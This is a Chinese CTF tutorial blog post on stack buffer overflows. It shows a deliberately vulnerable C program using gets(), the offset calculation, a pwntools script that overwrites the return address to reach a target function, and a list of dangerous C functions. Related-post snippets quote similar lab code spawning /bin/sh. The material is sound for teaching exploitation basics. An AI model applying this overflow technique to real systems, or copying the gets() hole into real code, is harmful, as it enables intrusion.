栈溢出原理

于 2022-08-27 14:32:09 发布
阅读量340 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/126557474
版权

1.栈溢出原理

  • 程序必须向栈上写入数据。
  • 写入的数据大小没有被良好的控制。
  • 高危函数:gets()本身是一个危险函数,它从不检查输入的字符串长度,用回车判断是否结束,所以很容易导致栈溢出。

例:

 

#include <stdio.h>
#include <string.h>
void success() { puts("You Hava already controlled it."); }
void vulnerable() {
  char s[12];
  gets(s);
  puts(s);
  return;
}
int main(int argc, char **argv) {
  vulnerable();
  return 0;
}

栈结构

s距离ebp的长度为0x14

 

 

b'a'*0x14 + b'aaaa'+sucess_addr

此时的栈结构为

 

注意:一般情况下采用的是小端存储,即0x0804843b内存形式为:

\x3b\x84\x80\x08 

##coding=utf8
from pwn import *
## 构造与程序交互的对象
sh = process('./stack_example')
success_addr = 0x0804843b
## 构造payload
payload = 'a' * 0x14 + 'bbbb' + p32(success_addr)
print p32(success_addr)
## 向程序发送字符串
sh.sendline(payload)
## 将代码交互转换为手工交互
sh.interactive()

覆盖要求

  • 覆盖函数返回地址,这时候看ebp即可
  • 覆盖栈上某个变量的内容,这时候就需要更加精细的计算
  • 覆盖bss段某个变量的内容
  • 根据实际执行情况,覆盖特定的变量或地址的内容

危险函数

  • 输入
    • ​​​​​​​​​​​​​​​gets,直接读取一行,忽略‘\x00’
    • scanf
    • vscanf
  • 输出
    • ​​​​​​​sprintf
  • 字符串
    • ​​​​​​​strcpy,字符串复制,遇到'\x00'停止
    • strcat,字符串拼接,遇到'\x00'停止
    • bcopy
L__y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全——溢出漏洞逆向分析
05-14
计算机程序一般都会使用到一些内存,这些内存会提供给程序内部使用,或者是存放用户的输入数据,这样的内存一般称作缓冲区。...只不过溢出发生在上,而堆溢出发生在堆上,其实他们的原理都是一样的。
浅析溢出原理
najdhdfh的博客
10-20 1万+
函数的调用 准备工具: linux系统 调试工具gdb gdb插件:pwndbg 关于pwndbg插件可以在github搜索并下载安装,需要python环境 工具准备好之后,来看一段简单的代码,我们将通过调试分析这段简单的代码来理解函数在被调用前后都做了哪些操作. #include<stdio.h> int add(int a, int b){ return a + b; } int main(){ int num = add(1,2); printf("resu
binary_vulnerability:二进制突破之溢出原理和利用技术,绕过安全保护技术(绕过NX,ASLR,PIE,Canary,RELRO等),格式化串行突破原理是利用技术,大量溢出漏洞原理和利用技术,glibc2 .30内存管理二进制文件深入分析,堆迭扩展(fastbin攻击,UAF,双重释放,堆重叠和扩展攻击,unlink攻击,house系列攻击)突破原理和攻破技巧
03-23
该项目是关于挖掘二进制突破的一些技术和技巧,可以理解为它是一个教材,里面包含了一些常见突破的原理和攻击方式。 由于本人水平有限,不能避免可能会在文档中出现错误,敬请原谅。 注意: 该项目版权尽属于我个人...
溢出 (1).pdf
09-30
溢出是pwn的根本也是萌新入坑最好的方式,里面有溢出的根本原理等希望喜欢
基于Windows操作系统的溢出攻击验证 (2010年)
05-22
目前大部分的缓冲区溢出的攻击都是...作者针对Windows操作系统,对溢出原理进行了相关分析,并通过实例完成了一个溢出的攻击验证.实验结果表明,针对有漏洞的代码可以进行漏洞攻击,并给出了防止漏洞攻击的几点建议.
溢出攻击技术 windows linux下的都有
08-27
缓冲区溢出攻击简介 基本概念及发展历史 背景知识 (Linux & win32) 缓冲区溢出攻击的原理 溢出攻击如何工作? Linux: 溢出, shellcode Win32: 溢出, shellcode 总结 有需要的话,我有光盘。可以找我。
溢出基本原理的简单讲解
热门推荐
yan_star的博客
03-31 3万+
溢出基本原理的简单讲解 (新手上路,大牛还请自行跳过,不足之处,欢迎批评指正) 一 、预备知识: 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而溢出是缓冲区溢出的一种,也是最常见的。只不过溢出发生在,堆溢出发生在堆,其实都是一样的。 的简单介绍 是一种计算机系...
溢出原理(一)系统的工作原理
single7_的博客
11-27 524
0x01 内存的不同用途 缓冲区溢出(buffer overflow),在电脑学上是指针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁著中断之际并获取程序乃至系统的控制权。 缓冲区溢出原指当某个数据超过了处理程序回传堆地址限制的范围时,程序出现的异常操作。造成此现象的原因有: 存在缺陷的程序设计 尤其是C语言,不像其他一些高级语言会自动进行数组或者指针的堆区块边界检查,增加溢出风险。 C语言中的C标准库还具有一些非常危险的操作函数,
溢出
jfkidear的专栏
03-29 719
溢出就是不顾堆中分配的局部数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了别的数据。 可以理解为 在长字符串中嵌入一段代码,并将过程的返回地址覆盖为这段代码的地址,这样当过程返回时,程序就转而开始执行这段自编的代码了。 比如如下这段程序: #include int main() { char name[8]; printf("Please
攻击-gets函数
helloworlddm的博客
06-17 1484
函数条用约定(Linux) 需要注意的是,32 位和 64 位程序有以下简单的区别 x86 函数参数在函数返回地址的上方 x64 System V AMD64 ABI (Linux、FreeBSD、macOS 等采用) 中前六个整型或指针参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 寄存器中,如果还有更多的参数的话才会保存在上。 内存地址不能大于 0x00007FFFFFFFFFFF,6 个字节长度,否则会抛出异常。 堆溢出原理 溢出指的是程序向中某个变量中写入的字节数
溢出学习
feng的博客
01-16 1838
前言 跟着ctfwiki学习,所有题目都在ctfwiki上可以找到。加油加油。 溢出原理 溢出指的是程序向中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
PWN入门系列(2)溢出
小心信科理化声
12-02 1409
PWN入门系列(2) 溢出 溢出指的是程序向中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
C语言中 gets( ) 的缓冲区溢出问题,慎用!!
longteng_guo的博客
08-07 3507
头文件:#include <stdio.h> gets()函数用于从缓冲区中读取字符串,其原型如下: char *gets(char *string); gets()函数从流中读取字符串,直到出现换行符或读到文件尾为止,最后加上NULL作为字符串结束。所读取的字符串暂存在给定的参数string中。 【返回值】若成功则返回string的指针,否则返回NULL。 注意:由于gets()不检查字符串string的大小,必须遇到换行符或文件结尾才会结束输入,因此容易造成缓存溢出的安全性问题,导致程序崩溃
gets()函数缓冲区溢出实验
Hello World.c
10-24 4019
用于测试的漏洞程序如下: #include&lt;stdio.h&gt; #include&lt;windows.h&gt; void pf() { char buf[50]; gets(buf); printf("%s\n",buf); } int main() { int a; printf("this is just a test\n"); pf(); ...
C语言gets()函数数据溢出
m0_67380456的博客
05-15 761
用gets函数获得输入时,对输入的数据大小内容没有做出限制,但它实际上只取自身实际储存大小进行保存,而多余的输入被保存在缓冲区中,覆盖后面的存储区。 这是一段检验输入密码的代码 #include<stdio.h> int main(){ char password[8] = "secret", Get[8]; while(1) { printf("Enter your password:"); ...
实验五 溢出漏洞原理
最新发布
05-18
溢出漏洞是一种常见的安全漏洞,其原理是程序在运行时使用来存储函数的局部变量、参数和返回地址等信息,如果程序写入超过分配给的内存空间的数据,就会导致溢出,可能导致程序崩溃或被攻击者利用。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值